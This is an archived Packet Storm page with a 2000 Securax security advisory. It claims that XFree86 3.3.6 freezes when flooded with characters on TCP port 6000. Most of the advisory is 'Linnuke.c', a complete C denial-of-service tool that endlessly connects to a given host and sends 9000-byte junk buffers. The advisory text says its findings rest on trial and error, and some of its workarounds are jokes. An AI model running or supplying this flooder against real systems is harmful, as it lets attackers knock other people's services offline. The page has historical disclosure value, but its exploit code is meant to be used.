exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

scx-sa-11.txt

scx-sa-11.txt
Posted Jan 1, 2001
Authored by Root-dude | Site securax.org

Securax Security Advisory #11 - XFree86 Version 3.3.6 is vulnerable to a remote denial of service attack over tcp port 6000. The server can freeze if sent many characters, requiring a reboot to restore normal operation. Includes Linnuke.c proof of concept code.

tags | exploit, remote, denial of service, tcp, proof of concept
SHA-256 | d85f44f0f08c172627069fd7c4b1a4471100fdaa8e7642820989936cc36dee3f

scx-sa-11.txt

Change Mirror Download
=============================================================================
Securax-SA-11 Security Advisory
belgian.networking.security Dutch
=============================================================================
Topic: X-windows can be caused to freeze.
Announced: 2000-12-26
Affects: XFree86 Version 3.3.6 / X Window System [on SuSE 6.4]
Other versions not tested.
=============================================================================



Note: This entire advisory has been based upon trial and error results. We
can not ensure the information below is 100% correct being that we have
no source code to audit. This document is subject to change without
prior notice.

If you happen to find more information or problems concerning the below
problem or further varients please contact me on the following email
root@htw.zzn.com (or ilja@securax.org), or you can contact the securax
info@securax.org.

I. Problem Description
-----------------------

When a large amount of characters are send to the X-windows deamon (port 6000
), X-windows will become laggy for a few secondes, so if one would send a
lot of characters to it, in a continious loop, the server will freeze!, the
only thing that works as far as I know to get X back to work is a reboot.

II. Impact
----------

X-windows servers can be caused to be laggy and even to freeze, the code in
this advisory is proof of concept code for this DoS.

/* --| BOF |-- */

/* Linnuke.c (DoS)
*
* written by R00T-dude
*
* first of all, why the lame name
* remember in the "good old days" the winnuke.c
* well this gives about the same effect on linux
* and probably any other form of unix that has
* X-windows port (6000) open.
*
* I found this when I was playing around with
* this stresstool I was coding, I noticed my
* X-win became pretty laggy when I sended 9000 A's
* to port 6000, so I started coding on some
* easy poc code for X-win and well, euh, ...
* X-win FROZE !!!, so far all you can do to
* get X to work again is reboot.
*
* In no way, form or shape can I nor the securax crew
* be held responsible for any use and/or misuse of this
* code.
*
* greetz to: |ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0,
* t-omicron, [tosh], demongirl, zym0t1c,segfau|t, so many others I forgot
*
*/

#include <stdio.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>

main(int argc, char **argv)
{
int sock, conn, i, b;
char buff[10000];
struct sockaddr_in sin;
struct hostent *hp;

for(i=0; i<9000; i++)
{
strcat(buff, "\x41"); /* SHELLCODE ?? :) */
}
strcat(buff, "\n");

if( (hp=gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Gethostbyname() !"); exit(0);
}

for(b=0; b < b +1; b++)
{
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
{
fprintf(stderr, "Socket() !\n"); exit(sock);
}
sin.sin_family = AF_INET;
sin.sin_port = 6000;
sin.sin_addr.s_addr = inet_addr(argv[1]);

conn = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
if (conn < 0)
{
printf("Connect() !\n");
/* don't exit(); or the loop will stop */
}

send(sock, buff, sizeof(buff), 0);
close(sock);
}
}

/* --| EOF |-- */

III. possible workarounds
-------------------------

possible workarounds :: - don't use X, who needs it anyway
- close the X-win port
- filter the X-win port with a decent firewall
(however, you can still be Dossed (local))
- use windows (euh, nevermind)

IV credits
----------

thx go out to : Incubus for testing
greetz go out to :|ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0, t-omicron,
[tosh], demongirl, zym0t1c,segfau|t, so many others I forgot

-R00T-dude(root@htw.zzn.com or ilja@securax.org).
=============================================================================
For more information ilja@securax.org
Website http://www.securax.org
Advisories/Text http://www.securax.org/pers
-----------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close